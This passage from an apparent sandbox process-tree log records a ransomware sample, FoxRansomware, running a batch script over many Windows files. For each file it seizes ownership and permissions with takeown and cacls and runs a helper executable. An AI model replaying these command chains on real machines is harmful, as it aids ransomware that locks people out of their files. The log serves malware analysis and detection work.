C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"3⤵
- Modifies file permissions
PID:5600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner3⤵PID:3732
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner4⤵PID:6020
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.9597c6cc-2302-4ae3-a665-e851ed2a5ca1.1.etl""2⤵PID:2480
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.9597c6cc-2302-4ae3-a665-e851ed2a5ca1.1.etl" /E /G Admin:F /C3⤵PID:2148
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.9597c6cc-2302-4ae3-a665-e851ed2a5ca1.1.etl"3⤵PID:4428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "UpdateSessionOrchestration.9597c6cc-2302-4ae3-a665-e851ed2a5ca1.1.etl" -nobanner3⤵PID:3304
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "UpdateSessionOrchestration.9597c6cc-2302-4ae3-a665-e851ed2a5ca1.1.etl" -nobanner4⤵PID:6104
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin""2⤵PID:5116
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin" /E /G Admin:F /C3⤵PID:288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin"3⤵PID:5764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000000C.bin" -nobanner3⤵PID:5584
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000000C.bin" -nobanner4⤵PID:5636
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin""2⤵PID:284
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin" /E /G Admin:F /C3⤵PID:6068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin"3⤵PID:4316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000000O.bin" -nobanner3⤵PID:4356
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000000O.bin" -nobanner4⤵PID:1048
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin""2⤵PID:5940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin" /E /G Admin:F /C3⤵PID:3080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin"3⤵PID:5788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000012.bin" -nobanner3⤵PID:5192
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000012.bin" -nobanner4⤵PID:5404
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin""2⤵PID:6072
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin" /E /G Admin:F /C3⤵PID:5256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000056.bin"3⤵PID:856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000056.bin" -nobanner3⤵PID:5392
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000056.bin" -nobanner4⤵PID:1040
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4400
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin""2⤵PID:5156
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin" /E /G Admin:F /C3⤵PID:5816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin"3⤵PID:4248
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000072.bin" -nobanner3⤵PID:5136
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000072.bin" -nobanner4⤵PID:5548
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:612
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin""2⤵PID:1456
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin" /E /G Admin:F /C3⤵PID:6064
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin"3⤵
- Modifies file permissions
PID:5556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000007C.bin" -nobanner3⤵PID:5884
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000007C.bin" -nobanner4⤵PID:5560
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin""2⤵PID:2824
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin" /E /G Admin:F /C3⤵PID:4304
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin"3⤵PID:3560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000007M.bin" -nobanner3⤵PID:2168
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000007M.bin" -nobanner4⤵PID:5644
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin""2⤵PID:5476
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin" /E /G Admin:F /C3⤵PID:4388
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin"3⤵PID:5848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000008L.bin" -nobanner3⤵PID:1396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000008L.bin" -nobanner4⤵PID:4920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin""2⤵PID:6020
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin" /E /G Admin:F /C3⤵PID:5824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin"3⤵PID:5528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000091.bin" -nobanner3⤵PID:6028
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000091.bin" -nobanner4⤵PID:5176
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4508
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin""2⤵PID:2172
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin" /E /G Admin:F /C3⤵PID:2264
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin"3⤵
- Modifies file permissions
PID:2564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000009M.bin" -nobanner3⤵PID:268
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000009M.bin" -nobanner4⤵PID:2932
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin""2⤵PID:2952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin" /E /G Admin:F /C3⤵PID:5368
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin"3⤵PID:5932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "000000A7.bin" -nobanner3⤵PID:5660
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "000000A7.bin" -nobanner4⤵PID:1708
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.6f1ab0b2-003e-43f6-8045-354a76feae40.1.etl""2⤵PID:5300
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.6f1ab0b2-003e-43f6-8045-354a76feae40.1.etl" /E /G Admin:F /C3⤵PID:5604
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.6f1ab0b2-003e-43f6-8045-354a76feae40.1.etl"3⤵PID:2348
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "UpdateSessionOrchestration.6f1ab0b2-003e-43f6-8045-354a76feae40.1.etl" -nobanner3⤵PID:5248
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "UpdateSessionOrchestration.6f1ab0b2-003e-43f6-8045-354a76feae40.1.etl" -nobanner4⤵PID:5404
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:5952
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:5256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵PID:4324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "background.png" -nobanner3⤵PID:3716
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "background.png" -nobanner4⤵PID:4876
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""2⤵PID:5392
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C3⤵PID:2500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"3⤵
- Modifies file permissions
PID:5360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "tasks.xml" -nobanner3⤵PID:3488
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "tasks.xml" -nobanner4⤵PID:5332
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin""2⤵PID:5136
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin" /E /G Admin:F /C3⤵PID:5864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin"3⤵
- Modifies file permissions
PID:5576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000008.bin" -nobanner3⤵PID:3696
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000008.bin" -nobanner4⤵PID:4080
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin""2⤵PID:1436
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin" /E /G Admin:F /C3⤵PID:5228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin"3⤵PID:5408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000000M.bin" -nobanner3⤵PID:4628
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000000M.bin" -nobanner4⤵PID:1456
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin""2⤵PID:3692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin" /E /G Admin:F /C3⤵PID:420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin"3⤵PID:5644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000010.bin" -nobanner3⤵PID:5656
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000010.bin" -nobanner4⤵PID:5972
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5456
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin""2⤵PID:6004
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin" /E /G Admin:F /C3⤵PID:5756
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin"3⤵PID:1396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000054.bin" -nobanner3⤵PID:5340
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000054.bin" -nobanner4⤵PID:5420
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin""2⤵PID:4728
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin" /E /G Admin:F /C3⤵PID:544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin"3⤵
- Modifies file permissions
PID:4392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000070.bin" -nobanner3⤵PID:2300
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000070.bin" -nobanner4⤵PID:6104
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin""2⤵PID:4204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin" /E /G Admin:F /C3⤵PID:3660
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin"3⤵PID:6044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000007A.bin" -nobanner3⤵PID:4724
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000007A.bin" -nobanner4⤵PID:3208
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin""2⤵PID:2196
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin" /E /G Admin:F /C3⤵PID:5232
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin"3⤵PID:1708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000007K.bin" -nobanner3⤵PID:292
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000007K.bin" -nobanner4⤵PID:4140
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin""2⤵PID:272
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin" /E /G Admin:F /C3⤵PID:3184
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin"3⤵PID:4804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000008J.bin" -nobanner3⤵PID:5152
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000008J.bin" -nobanner4⤵PID:2188
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:280
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin""2⤵PID:5364
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin" /E /G Admin:F /C3⤵PID:2720
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin"3⤵PID:5112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000008V.bin" -nobanner3⤵PID:5140
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000008V.bin" -nobanner4⤵PID:5104
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml""2⤵PID:5356
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml" /E /G Admin:F /C3⤵PID:3252
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml"3⤵PID:5332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner3⤵PID:5548
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner4⤵PID:5432
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml""2⤵PID:5668
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml" /E /G Admin:F /C3⤵PID:2136
-
-
